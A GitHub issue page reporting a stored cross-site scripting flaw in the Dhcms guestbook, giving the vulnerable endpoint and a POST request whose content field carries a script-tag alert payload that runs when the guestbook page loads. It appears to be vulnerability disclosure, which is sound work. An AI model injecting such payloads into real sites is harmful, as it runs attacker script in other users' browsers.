Skip to content

Dhcms Stored-XSS Vulnerabilities_in guestbook #3

Open
@epony4c

Description

@epony4c

Holes for details:
in guestbook

`http://192.168.3.56/dhcms/api.php?r=dhcms/Form/push

POST:
content=1'"()%26%25<ScRiPt%20>alert(5555)</ScRiPt>&email=sample%40email.tst&keyword=e&model=1&name=e&table=guestbook&token=+7c817f9ed88f10ea0b0070efe974c29c+`

image

you can Executed alert。

http://192.168.3.56/dhcms/index.php?r=DhCms/Form/index&name=guestbook

image

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions